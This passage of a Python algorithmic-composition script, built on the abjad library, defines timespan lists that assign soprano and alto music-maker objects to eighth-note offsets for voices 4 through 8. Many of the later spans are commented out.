# [(110, 8), (112, 8), soprano_two_musicmaker_three],
#
# [(112, 8), (114, 8), soprano_two_musicmaker_three],
# [(114, 8), (116, 8), soprano_two_musicmaker_two],
# [(116, 8), (118, 8), soprano_two_musicmaker_three],
# [(118, 8), (120, 8), soprano_two_musicmaker_three],
#
# [(120, 8), (122, 8), soprano_two_musicmaker_two],
# [(122, 8), (124, 8), soprano_two_musicmaker_three],
# [(124, 8), (126, 8), soprano_two_musicmaker_two],
# [(126, 8), (128, 8), soprano_two_musicmaker_two],
#
# [(128, 8), (130, 8), soprano_two_musicmaker_three],
# [(130, 8), (132, 8), soprano_two_musicmaker_two],
# [(132, 8), (134, 8), soprano_two_musicmaker_two],
# [(134, 8), (136, 8), soprano_two_musicmaker_three],
# [(136, 8), (138, 8), soprano_two_musicmaker_three],
# [(138, 8), (140, 8), soprano_two_musicmaker_three],
# [(140, 8), (142, 8), soprano_two_musicmaker_three],
# [(142, 8), (144, 8), soprano_two_musicmaker_two],
#
# [(144, 8), (146, 8), soprano_two_musicmaker_three],
# [(146, 8), (148, 8), soprano_two_musicmaker_three],
# [(148, 8), (150, 8), soprano_two_musicmaker_three],
# [(150, 8), (152, 8), soprano_two_musicmaker_two],
#
# [(152, 8), (154, 8), soprano_two_musicmaker_two],
# [(154, 8), (156, 8), soprano_two_musicmaker_two],
# [(156, 8), (158, 8), soprano_two_musicmaker_three],
# [(158, 8), (160, 8), soprano_two_musicmaker_three],
#
# [(160, 8), (162, 8), soprano_two_musicmaker_two],
# [(162, 8), (164, 8), soprano_two_musicmaker_three],
# [(164, 8), (166, 8), soprano_two_musicmaker_three],
# [(166, 8), (168, 8), soprano_two_musicmaker_two],
#
# [(168, 8), (170, 8), soprano_two_musicmaker_two],
# [(170, 8), (172, 8), soprano_two_musicmaker_three],
# [(172, 8), (174, 8), soprano_two_musicmaker_three],
# [(174, 8), (176, 8), soprano_two_musicmaker_two],
#
# [(176, 8), (178, 8), soprano_two_musicmaker_two],
# [(178, 8), (180, 8), soprano_two_musicmaker_two],
# [(180, 8), (182, 8), soprano_two_musicmaker_three],
# [(182, 8), (184, 8), soprano_two_musicmaker_three],
#
# [(184, 8), (186, 8), soprano_two_musicmaker_two],
# [(186, 8), (188, 8), soprano_two_musicmaker_three],
# [(188, 8), (190, 8), soprano_two_musicmaker_two],
# [(190, 8), (192, 8), soprano_two_musicmaker_two],
#
# [(192, 8), (194, 8), soprano_two_musicmaker_three],
# [(194, 8), (196, 8), soprano_two_musicmaker_three],
# [(196, 8), (198, 8), soprano_two_musicmaker_three],
# [(198, 8), (199, 8), soprano_two_musicmaker_three],
]
])
voice_4_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
music_maker=music_maker,
voice_name='Voice 4',
),
)
for start_offset, stop_offset, music_maker in [
[(0, 8), (2, 8), soprano_three_musicmaker_three],
[(2, 8), (4, 8), soprano_three_musicmaker_two],
[(4, 8), (6, 8), soprano_three_musicmaker_two],
[(6, 8), (8, 8), soprano_three_musicmaker_two],
[(8, 8), (10, 8), soprano_three_musicmaker_three],
[(10, 8), (12, 8), soprano_three_musicmaker_three],
[(12, 8), (14, 8), soprano_three_musicmaker_three],
[(14, 8), (16, 8), soprano_three_musicmaker_three],
[(16, 8), (18, 8), soprano_three_musicmaker_two],
[(18, 8), (20, 8), soprano_three_musicmaker_two],
[(20, 8), (22, 8), soprano_three_musicmaker_two],
[(22, 8), (24, 8), soprano_three_musicmaker_two],
[(24, 8), (26, 8), soprano_three_musicmaker_two],
[(26, 8), (28, 8), soprano_three_musicmaker_three],
[(28, 8), (30, 8), soprano_three_musicmaker_two],
[(30, 8), (32, 8), soprano_three_musicmaker_three],
[(32, 8), (34, 8), soprano_three_musicmaker_three],
[(34, 8), (36, 8), soprano_three_musicmaker_two],
[(36, 8), (38, 8), soprano_three_musicmaker_two],
[(38, 8), (40, 8), soprano_three_musicmaker_three],
[(40, 8), (42, 8), soprano_three_musicmaker_three],
[(42, 8), (44, 8), soprano_three_musicmaker_three],
[(44, 8), (46, 8), soprano_three_musicmaker_two],
[(46, 8), (48, 8), soprano_three_musicmaker_two],
[(48, 8), (50, 8), soprano_three_musicmaker_two],
[(50, 8), (52, 8), soprano_three_musicmaker_two],
[(52, 8), (54, 8), soprano_three_musicmaker_two],
[(54, 8), (56, 8), soprano_three_musicmaker_three],
[(56, 8), (58, 8), soprano_three_musicmaker_two],
[(58, 8), (60, 8), soprano_three_musicmaker_three],
[(60, 8), (62, 8), soprano_three_musicmaker_three],
[(62, 8), (64, 8), soprano_three_musicmaker_three],
[(64, 8), (66, 8), soprano_three_musicmaker_three],
[(66, 8), (68, 8), soprano_three_musicmaker_three],
[(68, 8), (70, 8), soprano_three_musicmaker_two],
[(70, 8), (72, 8), soprano_three_musicmaker_three],
[(72, 8), (74, 8), soprano_three_musicmaker_two],
[(74, 8), (76, 8), soprano_three_musicmaker_three],
[(76, 8), (78, 8), soprano_three_musicmaker_two],
[(78, 8), (80, 8), soprano_three_musicmaker_two],
[(80, 8), (82, 8), soprano_three_musicmaker_two],
[(82, 8), (84, 8), soprano_three_musicmaker_two],
[(84, 8), (86, 8), soprano_three_musicmaker_three],
[(86, 8), (88, 8), soprano_three_musicmaker_three],
[(88, 8), (90, 8), soprano_three_musicmaker_three],
[(90, 8), (92, 8), soprano_three_musicmaker_three],
[(92, 8), (94, 8), soprano_three_musicmaker_three],
[(94, 8), (96, 8), soprano_three_musicmaker_two],
[(96, 8), (98, 8), soprano_three_musicmaker_three],
[(98, 8), (100, 8), soprano_three_musicmaker_three],
[(100, 8), (102, 8), soprano_three_musicmaker_two],
[(102, 8), (104, 8), soprano_three_musicmaker_three],
# [(104, 8), (106, 8), soprano_three_musicmaker_three],
# [(106, 8), (108, 8), soprano_three_musicmaker_two],
# [(108, 8), (110, 8), soprano_three_musicmaker_two],
# [(110, 8), (112, 8), soprano_three_musicmaker_two],
#
# [(112, 8), (114, 8), soprano_three_musicmaker_two],
# [(114, 8), (116, 8), soprano_three_musicmaker_three],
# [(116, 8), (118, 8), soprano_three_musicmaker_three],
# [(118, 8), (120, 8), soprano_three_musicmaker_three],
#
# [(120, 8), (122, 8), soprano_three_musicmaker_three],
# [(122, 8), (124, 8), soprano_three_musicmaker_two],
# [(124, 8), (126, 8), soprano_three_musicmaker_two],
# [(126, 8), (128, 8), soprano_three_musicmaker_three],
#
# [(128, 8), (130, 8), soprano_three_musicmaker_two],
# [(130, 8), (132, 8), soprano_three_musicmaker_two],
# [(132, 8), (134, 8), soprano_three_musicmaker_three],
# [(134, 8), (136, 8), soprano_three_musicmaker_two],
# [(136, 8), (138, 8), soprano_three_musicmaker_two],
# [(138, 8), (140, 8), soprano_three_musicmaker_two],
# [(140, 8), (142, 8), soprano_three_musicmaker_three],
# [(142, 8), (144, 8), soprano_three_musicmaker_three],
#
# [(144, 8), (146, 8), soprano_three_musicmaker_three],
# [(146, 8), (148, 8), soprano_three_musicmaker_two],
# [(148, 8), (150, 8), soprano_three_musicmaker_three],
# [(150, 8), (152, 8), soprano_three_musicmaker_two],
#
# [(152, 8), (154, 8), soprano_three_musicmaker_three],
# [(154, 8), (156, 8), soprano_three_musicmaker_three],
# [(156, 8), (158, 8), soprano_three_musicmaker_two],
# [(158, 8), (160, 8), soprano_three_musicmaker_two],
#
# [(160, 8), (162, 8), soprano_three_musicmaker_two],
# [(162, 8), (164, 8), soprano_three_musicmaker_two],
# [(164, 8), (166, 8), soprano_three_musicmaker_two],
# [(166, 8), (168, 8), soprano_three_musicmaker_three],
#
# [(168, 8), (170, 8), soprano_three_musicmaker_two],
# [(170, 8), (172, 8), soprano_three_musicmaker_three],
# [(172, 8), (174, 8), soprano_three_musicmaker_three],
# [(174, 8), (176, 8), soprano_three_musicmaker_two],
#
# [(176, 8), (178, 8), soprano_three_musicmaker_two],
# [(178, 8), (180, 8), soprano_three_musicmaker_three],
# [(180, 8), (182, 8), soprano_three_musicmaker_three],
# [(182, 8), (184, 8), soprano_three_musicmaker_three],
#
# [(184, 8), (186, 8), soprano_three_musicmaker_two],
# [(186, 8), (188, 8), soprano_three_musicmaker_two],
# [(188, 8), (190, 8), soprano_three_musicmaker_three],
# [(190, 8), (192, 8), soprano_three_musicmaker_two],
#
# [(192, 8), (194, 8), soprano_three_musicmaker_two],
# [(194, 8), (196, 8), soprano_three_musicmaker_two],
# [(196, 8), (198, 8), soprano_three_musicmaker_three],
# [(198, 8), (199, 8), soprano_three_musicmaker_three],
]
])
voice_5_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
music_maker=music_maker,
voice_name='Voice 5',
),
)
for start_offset, stop_offset, music_maker in [
[(0, 8), (2, 8), alto_one_musicmaker_three],
[(2, 8), (4, 8), alto_one_musicmaker_three],
[(4, 8), (6, 8), alto_one_musicmaker_two],
[(6, 8), (8, 8), alto_one_musicmaker_two],
[(8, 8), (10, 8), alto_one_musicmaker_two],
[(10, 8), (12, 8), alto_one_musicmaker_three],
[(12, 8), (14, 8), alto_one_musicmaker_two],
[(14, 8), (16, 8), alto_one_musicmaker_three],
[(16, 8), (18, 8), alto_one_musicmaker_three],
[(18, 8), (20, 8), alto_one_musicmaker_three],
[(20, 8), (22, 8), alto_one_musicmaker_three],
[(22, 8), (24, 8), alto_one_musicmaker_three],
[(24, 8), (26, 8), alto_one_musicmaker_two],
[(26, 8), (28, 8), alto_one_musicmaker_two],
[(28, 8), (30, 8), alto_one_musicmaker_two],
[(30, 8), (32, 8), alto_one_musicmaker_two],
[(32, 8), (34, 8), alto_one_musicmaker_two],
[(34, 8), (36, 8), alto_one_musicmaker_three],
[(36, 8), (38, 8), alto_one_musicmaker_three],
[(38, 8), (40, 8), alto_one_musicmaker_three],
[(40, 8), (42, 8), alto_one_musicmaker_two],
[(42, 8), (44, 8), alto_one_musicmaker_three],
[(44, 8), (46, 8), alto_one_musicmaker_two],
[(46, 8), (48, 8), alto_one_musicmaker_two],
[(48, 8), (50, 8), alto_one_musicmaker_two],
[(50, 8), (52, 8), alto_one_musicmaker_three],
[(52, 8), (54, 8), alto_one_musicmaker_two],
[(54, 8), (56, 8), alto_one_musicmaker_three],
[(56, 8), (58, 8), alto_one_musicmaker_three],
[(58, 8), (60, 8), alto_one_musicmaker_three],
[(60, 8), (62, 8), alto_one_musicmaker_two],
[(62, 8), (64, 8), alto_one_musicmaker_three],
[(64, 8), (66, 8), alto_one_musicmaker_two],
[(66, 8), (68, 8), alto_one_musicmaker_three],
[(68, 8), (70, 8), alto_one_musicmaker_three],
[(70, 8), (72, 8), alto_one_musicmaker_two],
[(72, 8), (74, 8), alto_one_musicmaker_two],
[(74, 8), (76, 8), alto_one_musicmaker_three],
[(76, 8), (78, 8), alto_one_musicmaker_three],
[(78, 8), (80, 8), alto_one_musicmaker_three],
[(80, 8), (82, 8), alto_one_musicmaker_three],
[(82, 8), (84, 8), alto_one_musicmaker_two],
[(84, 8), (86, 8), alto_one_musicmaker_two],
[(86, 8), (88, 8), alto_one_musicmaker_two],
[(88, 8), (90, 8), alto_one_musicmaker_two],
[(90, 8), (92, 8), alto_one_musicmaker_three],
[(92, 8), (94, 8), alto_one_musicmaker_two],
[(94, 8), (96, 8), alto_one_musicmaker_three],
[(96, 8), (98, 8), alto_one_musicmaker_three],
[(98, 8), (100, 8), alto_one_musicmaker_two],
[(100, 8), (102, 8), alto_one_musicmaker_two],
[(102, 8), (104, 8), alto_one_musicmaker_three],
# [(104, 8), (106, 8), alto_one_musicmaker_three],
# [(106, 8), (108, 8), alto_one_musicmaker_three],
# [(108, 8), (110, 8), alto_one_musicmaker_two],
# [(110, 8), (112, 8), alto_one_musicmaker_two],
#
# [(112, 8), (114, 8), alto_one_musicmaker_two],
# [(114, 8), (116, 8), alto_one_musicmaker_two],
# [(116, 8), (118, 8), alto_one_musicmaker_three],
# [(118, 8), (120, 8), alto_one_musicmaker_three],
#
# [(120, 8), (122, 8), alto_one_musicmaker_three],
# [(122, 8), (124, 8), alto_one_musicmaker_three],
# [(124, 8), (126, 8), alto_one_musicmaker_two],
# [(126, 8), (128, 8), alto_one_musicmaker_two],
#
# [(128, 8), (130, 8), alto_one_musicmaker_two],
# [(130, 8), (132, 8), alto_one_musicmaker_two],
# [(132, 8), (134, 8), alto_one_musicmaker_two],
# [(134, 8), (136, 8), alto_one_musicmaker_three],
# [(136, 8), (138, 8), alto_one_musicmaker_three],
# [(138, 8), (140, 8), alto_one_musicmaker_three],
# [(140, 8), (142, 8), alto_one_musicmaker_three],
# [(142, 8), (144, 8), alto_one_musicmaker_three],
# [(144, 8), (146, 8), alto_one_musicmaker_two],
# [(146, 8), (148, 8), alto_one_musicmaker_two],
# [(148, 8), (150, 8), alto_one_musicmaker_two],
# [(150, 8), (152, 8), alto_one_musicmaker_two],
#
# [(152, 8), (154, 8), alto_one_musicmaker_two],
# [(154, 8), (156, 8), alto_one_musicmaker_three],
# [(156, 8), (158, 8), alto_one_musicmaker_three],
# [(158, 8), (160, 8), alto_one_musicmaker_three],
#
# [(160, 8), (162, 8), alto_one_musicmaker_three],
# [(162, 8), (164, 8), alto_one_musicmaker_three],
# [(164, 8), (166, 8), alto_one_musicmaker_two],
# [(166, 8), (168, 8), alto_one_musicmaker_two],
#
# [(168, 8), (170, 8), alto_one_musicmaker_two],
# [(170, 8), (172, 8), alto_one_musicmaker_two],
# [(172, 8), (174, 8), alto_one_musicmaker_two],
# [(174, 8), (176, 8), alto_one_musicmaker_three],
#
# [(176, 8), (178, 8), alto_one_musicmaker_three],
# [(178, 8), (180, 8), alto_one_musicmaker_three],
# [(180, 8), (182, 8), alto_one_musicmaker_three],
# [(182, 8), (184, 8), alto_one_musicmaker_three],
#
# [(184, 8), (186, 8), alto_one_musicmaker_two],
# [(186, 8), (188, 8), alto_one_musicmaker_two],
# [(188, 8), (190, 8), alto_one_musicmaker_two],
# [(190, 8), (192, 8), alto_one_musicmaker_two],
#
# [(192, 8), (194, 8), alto_one_musicmaker_two],
# [(194, 8), (196, 8), alto_one_musicmaker_three],
# [(196, 8), (198, 8), alto_one_musicmaker_three],
# [(198, 8), (199, 8), alto_one_musicmaker_three],
]
])
voice_6_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
music_maker=music_maker,
voice_name='Voice 6',
),
)
for start_offset, stop_offset, music_maker in [
[(0, 8), (2, 8), alto_two_musicmaker_three],
[(2, 8), (4, 8), alto_two_musicmaker_three],
[(4, 8), (6, 8), alto_two_musicmaker_three],
[(6, 8), (8, 8), alto_two_musicmaker_three],
[(8, 8), (10, 8), alto_two_musicmaker_two],
[(10, 8), (12, 8), alto_two_musicmaker_two],
[(12, 8), (14, 8), alto_two_musicmaker_two],
[(14, 8), (16, 8), alto_two_musicmaker_two],
[(16, 8), (18, 8), alto_two_musicmaker_two],
[(18, 8), (20, 8), alto_two_musicmaker_three],
[(20, 8), (22, 8), alto_two_musicmaker_three],
[(22, 8), (24, 8), alto_two_musicmaker_three],
[(24, 8), (26, 8), alto_two_musicmaker_two],
[(26, 8), (28, 8), alto_two_musicmaker_three],
[(28, 8), (30, 8), alto_two_musicmaker_three],
[(30, 8), (32, 8), alto_two_musicmaker_two],
[(32, 8), (34, 8), alto_two_musicmaker_two],
[(34, 8), (36, 8), alto_two_musicmaker_two],
[(36, 8), (38, 8), alto_two_musicmaker_two],
[(38, 8), (40, 8), alto_two_musicmaker_three],
[(40, 8), (42, 8), alto_two_musicmaker_three],
[(42, 8), (44, 8), alto_two_musicmaker_three],
[(44, 8), (46, 8), alto_two_musicmaker_two],
[(46, 8), (48, 8), alto_two_musicmaker_two],
[(48, 8), (50, 8), alto_two_musicmaker_three],
[(50, 8), (52, 8), alto_two_musicmaker_two],
[(52, 8), (54, 8), alto_two_musicmaker_three],
[(54, 8), (56, 8), alto_two_musicmaker_two],
[(56, 8), (58, 8), alto_two_musicmaker_two],
[(58, 8), (60, 8), alto_two_musicmaker_three],
[(60, 8), (62, 8), alto_two_musicmaker_three],
[(62, 8), (64, 8), alto_two_musicmaker_two],
[(64, 8), (66, 8), alto_two_musicmaker_two],
[(66, 8), (68, 8), alto_two_musicmaker_two],
[(68, 8), (70, 8), alto_two_musicmaker_three],
[(70, 8), (72, 8), alto_two_musicmaker_three],
[(72, 8), (74, 8), alto_two_musicmaker_three],
[(74, 8), (76, 8), alto_two_musicmaker_two],
[(76, 8), (78, 8), alto_two_musicmaker_two],
[(78, 8), (80, 8), alto_two_musicmaker_two],
[(80, 8), (82, 8), alto_two_musicmaker_two],
[(82, 8), (84, 8), alto_two_musicmaker_three],
[(84, 8), (86, 8), alto_two_musicmaker_three],
[(86, 8), (88, 8), alto_two_musicmaker_three],
[(88, 8), (90, 8), alto_two_musicmaker_three],
[(90, 8), (92, 8), alto_two_musicmaker_two],
[(92, 8), (94, 8), alto_two_musicmaker_two],
[(94, 8), (96, 8), alto_two_musicmaker_three],
[(96, 8), (98, 8), alto_two_musicmaker_two],
[(98, 8), (100, 8), alto_two_musicmaker_two],
[(100, 8), (102, 8), alto_two_musicmaker_three],
[(102, 8), (104, 8), alto_two_musicmaker_two],
# [(104, 8), (106, 8), alto_two_musicmaker_three],
# [(106, 8), (108, 8), alto_two_musicmaker_two],
# [(108, 8), (110, 8), alto_two_musicmaker_three],
# [(110, 8), (112, 8), alto_two_musicmaker_two],
#
# [(112, 8), (114, 8), alto_two_musicmaker_two],
# [(114, 8), (116, 8), alto_two_musicmaker_two],
# [(116, 8), (118, 8), alto_two_musicmaker_three],
# [(118, 8), (120, 8), alto_two_musicmaker_two],
#
# [(120, 8), (122, 8), alto_two_musicmaker_two],
# [(122, 8), (124, 8), alto_two_musicmaker_three],
# [(124, 8), (126, 8), alto_two_musicmaker_three],
# [(126, 8), (128, 8), alto_two_musicmaker_three],
#
# [(128, 8), (130, 8), alto_two_musicmaker_two],
# [(130, 8), (132, 8), alto_two_musicmaker_three],
# [(132, 8), (134, 8), alto_two_musicmaker_three],
# [(134, 8), (136, 8), alto_two_musicmaker_two],
# [(136, 8), (138, 8), alto_two_musicmaker_two],
# [(138, 8), (140, 8), alto_two_musicmaker_three],
# [(140, 8), (142, 8), alto_two_musicmaker_two],
# [(142, 8), (144, 8), alto_two_musicmaker_three],
#
# [(144, 8), (146, 8), alto_two_musicmaker_two],
# [(146, 8), (148, 8), alto_two_musicmaker_two],
# [(148, 8), (150, 8), alto_two_musicmaker_three],
# [(150, 8), (152, 8), alto_two_musicmaker_three],
#
# [(152, 8), (154, 8), alto_two_musicmaker_two],
# [(154, 8), (156, 8), alto_two_musicmaker_three],
# [(156, 8), (158, 8), alto_two_musicmaker_two],
# [(158, 8), (160, 8), alto_two_musicmaker_three],
#
# [(160, 8), (162, 8), alto_two_musicmaker_three],
# [(162, 8), (164, 8), alto_two_musicmaker_two],
# [(164, 8), (166, 8), alto_two_musicmaker_three],
# [(166, 8), (168, 8), alto_two_musicmaker_two],
#
# [(168, 8), (170, 8), alto_two_musicmaker_two],
# [(170, 8), (172, 8), alto_two_musicmaker_three],
# [(172, 8), (174, 8), alto_two_musicmaker_two],
# [(174, 8), (176, 8), alto_two_musicmaker_two],
#
# [(176, 8), (178, 8), alto_two_musicmaker_two],
# [(178, 8), (180, 8), alto_two_musicmaker_three],
# [(180, 8), (182, 8), alto_two_musicmaker_two],
# [(182, 8), (184, 8), alto_two_musicmaker_three],
#
# [(184, 8), (186, 8), alto_two_musicmaker_three],
# [(186, 8), (188, 8), alto_two_musicmaker_three],
# [(188, 8), (190, 8), alto_two_musicmaker_two],
# [(190, 8), (192, 8), alto_two_musicmaker_three],
#
# [(192, 8), (194, 8), alto_two_musicmaker_three],
# [(194, 8), (196, 8), alto_two_musicmaker_two],
# [(196, 8), (198, 8), alto_two_musicmaker_three],
# [(198, 8), (199, 8), alto_two_musicmaker_two],
]
])
voice_7_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
music_maker=music_maker,
voice_name='Voice 7',
),
)
for start_offset, stop_offset, music_maker in [
[(0, 8), (2, 8), alto_three_musicmaker_two],
[(2, 8), (4, 8), alto_three_musicmaker_two],
[(4, 8), (6, 8), alto_three_musicmaker_three],
[(6, 8), (8, 8), alto_three_musicmaker_two],
[(8, 8), (10, 8), alto_three_musicmaker_two],
[(10, 8), (12, 8), alto_three_musicmaker_three],
[(12, 8), (14, 8), alto_three_musicmaker_two],
[(14, 8), (16, 8), alto_three_musicmaker_three],
[(16, 8), (18, 8), alto_three_musicmaker_three],
[(18, 8), (20, 8), alto_three_musicmaker_three],
[(20, 8), (22, 8), alto_three_musicmaker_two],
[(22, 8), (24, 8), alto_three_musicmaker_two],
[(24, 8), (26, 8), alto_three_musicmaker_two],
[(26, 8), (28, 8), alto_three_musicmaker_three],
[(28, 8), (30, 8), alto_three_musicmaker_two],
[(30, 8), (32, 8), alto_three_musicmaker_three],
[(32, 8), (34, 8), alto_three_musicmaker_three],
[(34, 8), (36, 8), alto_three_musicmaker_three],
[(36, 8), (38, 8), alto_three_musicmaker_two],
[(38, 8), (40, 8), alto_three_musicmaker_three],
[(40, 8), (42, 8), alto_three_musicmaker_three],
[(42, 8), (44, 8), alto_three_musicmaker_two],
[(44, 8), (46, 8), alto_three_musicmaker_three],
[(46, 8), (48, 8), alto_three_musicmaker_three],
[(48, 8), (50, 8), alto_three_musicmaker_three],
[(50, 8), (52, 8), alto_three_musicmaker_two],
[(52, 8), (54, 8), alto_three_musicmaker_three],
[(54, 8), (56, 8), alto_three_musicmaker_two],
[(56, 8), (58, 8), alto_three_musicmaker_two],
[(58, 8), (60, 8), alto_three_musicmaker_three],
[(60, 8), (62, 8), alto_three_musicmaker_three],
[(62, 8), (64, 8), alto_three_musicmaker_three],
[(64, 8), (66, 8), alto_three_musicmaker_two],
[(66, 8), (68, 8), alto_three_musicmaker_two],
[(68, 8), (70, 8), alto_three_musicmaker_two],
[(70, 8), (72, 8), alto_three_musicmaker_two],
[(72, 8), (74, 8), alto_three_musicmaker_two],
[(74, 8), (76, 8), alto_three_musicmaker_three],
[(76, 8), (78, 8), alto_three_musicmaker_three],
[(78, 8), (80, 8), alto_three_musicmaker_three],
[(80, 8), (82, 8), alto_three_musicmaker_three],
[(82, 8), (84, 8), alto_three_musicmaker_two],
[(84, 8), (86, 8), alto_three_musicmaker_three],
[(86, 8), (88, 8), alto_three_musicmaker_two],
[(88, 8), (90, 8), alto_three_musicmaker_two],
[(90, 8), (92, 8), alto_three_musicmaker_two],
[(92, 8), (94, 8), alto_three_musicmaker_three],
[(94, 8), (96, 8), alto_three_musicmaker_two],
[(96, 8), (98, 8), alto_three_musicmaker_two],
[(98, 8), (100, 8), alto_three_musicmaker_three],
[(100, 8), (102, 8), alto_three_musicmaker_three],
[(102, 8), (104, 8), alto_three_musicmaker_three],
# [(104, 8), (106, 8), alto_three_musicmaker_two],
# [(106, 8), (108, 8), alto_three_musicmaker_three],
# [(108, 8), (110, 8), alto_three_musicmaker_two],
# [(110, 8), (112, 8), alto_three_musicmaker_two],
#
# [(112, 8), (114, 8), alto_three_musicmaker_three],
# [(114, 8), (116, 8), alto_three_musicmaker_three],
# [(116, 8), (118, 8), alto_three_musicmaker_three],
# [(118, 8), (120, 8), alto_three_musicmaker_two],
#
# [(120, 8), (122, 8), alto_three_musicmaker_three],
# [(122, 8), (124, 8), alto_three_musicmaker_two],
# [(124, 8), (126, 8), alto_three_musicmaker_two],
# [(126, 8), (128, 8), alto_three_musicmaker_three],
#
# [(128, 8), (130, 8), alto_three_musicmaker_three],
# [(130, 8), (132, 8), alto_three_musicmaker_two],
# [(132, 8), (134, 8), alto_three_musicmaker_two],
# [(134, 8), (136, 8), alto_three_musicmaker_three],
# [(136, 8), (138, 8), alto_three_musicmaker_two],
# [(138, 8), (140, 8), alto_three_musicmaker_three],
# [(140, 8), (142, 8), alto_three_musicmaker_three],
# [(142, 8), (144, 8), alto_three_musicmaker_three],
# [(144, 8), (146, 8), alto_three_musicmaker_three],
# [(146, 8), (148, 8), alto_three_musicmaker_two],
# [(148, 8), (150, 8), alto_three_musicmaker_two],
# [(150, 8), (152, 8), alto_three_musicmaker_two],
#
# [(152, 8), (154, 8), alto_three_musicmaker_two],
# [(154, 8), (156, 8), alto_three_musicmaker_three],
# [(156, 8), (158, 8), alto_three_musicmaker_two],
# [(158, 8), (160, 8), alto_three_musicmaker_three],
#
# [(160, 8), (162, 8), alto_three_musicmaker_three],
# [(162, 8), (164, 8), alto_three_musicmaker_three],
# [(164, 8), (166, 8), alto_three_musicmaker_two],
# [(166, 8), (168, 8), alto_three_musicmaker_three],
#
# [(168, 8), (170, 8), alto_three_musicmaker_three],
# [(170, 8), (172, 8), alto_three_musicmaker_two],
# [(172, 8), (174, 8), alto_three_musicmaker_three],
# [(174, 8), (176, 8), alto_three_musicmaker_two],
#
# [(176, 8), (178, 8), alto_three_musicmaker_two],
# [(178, 8), (180, 8), alto_three_musicmaker_two],
# [(180, 8), (182, 8), alto_three_musicmaker_three],
# [(182, 8), (184, 8), alto_three_musicmaker_three],
#
# [(184, 8), (186, 8), alto_three_musicmaker_three],
# [(186, 8), (188, 8), alto_three_musicmaker_two],
# [(188, 8), (190, 8), alto_three_musicmaker_three],
# [(190, 8), (192, 8), alto_three_musicmaker_two],
#
# [(192, 8), (194, 8), alto_three_musicmaker_two],
# [(194, 8), (196, 8), alto_three_musicmaker_two],
# [(196, 8), (198, 8), alto_three_musicmaker_two],
# [(198, 8), (199, 8), alto_three_musicmaker_three],
]
])
voice_8_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
music_maker=music_maker,
voice_name='Voice 8',
),
)
for start_offset, stop_offset, music_maker in [
[(0, 8), (2, 8), alto_four_musicmaker_two],
[(2, 8), (4, 8), alto_four_musicmaker_two],
[(4, 8), (6, 8), alto_four_musicmaker_two],
[(6, 8), (8, 8), alto_four_musicmaker_three],
[(8, 8), (10, 8), alto_four_musicmaker_three],
[(10, 8), (12, 8), alto_four_musicmaker_three],
[(12, 8), (14, 8), alto_four_musicmaker_two],
[(14, 8), (16, 8), alto_four_musicmaker_two],
[(16, 8), (18, 8), alto_four_musicmaker_two],
[(18, 8), (20, 8), alto_four_musicmaker_three],
[(20, 8), (22, 8), alto_four_musicmaker_three],
[(22, 8), (24, 8), alto_four_musicmaker_three],
[(24, 8), (26, 8), alto_four_musicmaker_three],
[(26, 8), (28, 8), alto_four_musicmaker_two],
[(28, 8), (30, 8), alto_four_musicmaker_two],
[(30, 8), (32, 8), alto_four_musicmaker_two],
[(32, 8), (34, 8), alto_four_musicmaker_two],
[(34, 8), (36, 8), alto_four_musicmaker_three],
[(36, 8), (38, 8), alto_four_musicmaker_three],
[(38, 8), (40, 8), alto_four_musicmaker_three],
[(40, 8), (42, 8), alto_four_musicmaker_three],
[(42, 8), (44, 8), alto_four_musicmaker_three],
[(44, 8), (46, 8), alto_four_musicmaker_two],
[(46, 8), (48, 8), alto_four_musicmaker_two],
[(48, 8), (50, 8), alto_four_musicmaker_two],
[(50, 8), (52, 8), alto_four_musicmaker_two],
[(52, 8), (54, 8), alto_four_musicmaker_three],
[(54, 8), (56, 8), alto_four_musicmaker_three],
[(56, 8), (58, 8), alto_four_musicmaker_three],
[(58, 8), (60, 8), alto_four_musicmaker_two],
[(60, 8), (62, 8), alto_four_musicmaker_three],
[(62, 8), (64, 8), alto_four_musicmaker_two],
[(64, 8), (66, 8), alto_four_musicmaker_three],
[(66, 8), (68, 8), alto_four_musicmaker_two],
[(68, 8), (70, 8), alto_four_musicmaker_three],
[(70, 8), (72, 8), alto_four_musicmaker_two],
[(72, 8), (74, 8), alto_four_musicmaker_two],
[(74, 8), (76, 8), alto_four_musicmaker_two],
[(76, 8), (78, 8), alto_four_musicmaker_three],
[(78, 8), (80, 8), alto_four_musicmaker_three],
[(80, 8), (82, 8), alto_four_musicmaker_three],
[(82, 8), (84, 8), alto_four_musicmaker_two],
[(84, 8), (86, 8), alto_four_musicmaker_three],
[(86, 8), (88, 8), alto_four_musicmaker_two],
[(88, 8), (90, 8), alto_four_musicmaker_three],
[(90, 8), (92, 8), alto_four_musicmaker_three],
[(92, 8), (94, 8), alto_four_musicmaker_two],
[(94, 8), (96, 8), alto_four_musicmaker_two],
[(96, 8), (98, 8), alto_four_musicmaker_two],
[(98, 8), (100, 8), alto_four_musicmaker_two],
[(100, 8), (102, 8), alto_four_musicmaker_two],
[(102, 8), (104, 8), alto_four_musicmaker_three],
# [(104, 8), (106, 8), alto_four_musicmaker_two],
# [(106, 8), (108, 8), alto_four_musicmaker_three],
# [(108, 8), (110, 8), alto_four_musicmaker_two],
# [(110, 8), (112, 8), alto_four_musicmaker_three],
#
# [(112, 8), (114, 8), alto_four_musicmaker_three],
# [(114, 8), (116, 8), alto_four_musicmaker_three],
# [(116, 8), (118, 8), alto_four_musicmaker_two],
# [(118, 8), (120, 8), alto_four_musicmaker_three],
#
# [(120, 8), (122, 8), alto_four_musicmaker_three],
# [(122, 8), (124, 8), alto_four_musicmaker_two],
# [(124, 8), (126, 8), alto_four_musicmaker_three],
# [(126, 8), (128, 8), alto_four_musicmaker_two],
#
# [(128, 8), (130, 8), alto_four_musicmaker_two],
# [(130, 8), (132, 8), alto_four_musicmaker_two],
# [(132, 8), (134, 8), alto_four_musicmaker_three],
# [(134, 8), (136, 8), alto_four_musicmaker_two],
